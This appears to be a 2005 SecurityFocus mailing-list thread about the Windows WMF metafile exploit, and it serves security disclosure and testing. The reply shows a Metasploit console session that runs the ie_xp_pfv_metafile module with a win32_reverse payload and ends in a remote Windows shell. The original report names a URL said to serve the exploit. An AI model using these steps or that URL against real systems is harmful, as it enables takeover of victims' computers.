Is this a new exploit? Dec 27 2005 08:20PM
noemailpls noemail ziper (1 replies)
Re: Is this a new exploit? Dec 28 2005 03:34AM
H D Moore (sflist digitaloffense net)
I ported the exploit to the Metasploit Framework in case anyone wants to
test it without installing a thousand spyware apps...

Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:


Tested on Win XP SP1 and SP2.


+ -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST
msf ie_xp_pfv_metafile(win32_reverse) > exploit

[*] Starting Reverse Handler.
[*] Waiting for connections to
[*] HTTP Client connected from using Windows XP
[*] Got connection from <->

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXX\Desktop>

On Tuesday 27 December 2005 14:20, noemailpls (at) noemail (dot) zipe [email concealed]r wrote:
> Warning the following URL successfully exploited a fully patched
> windows xp system with a freshly updated norton anti virus.
> unionseek.com/d/t1/wmf_exp.htm
> The url runs a .wmf and executes the virus, f-secure will pick up the
> virus norton will not.

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus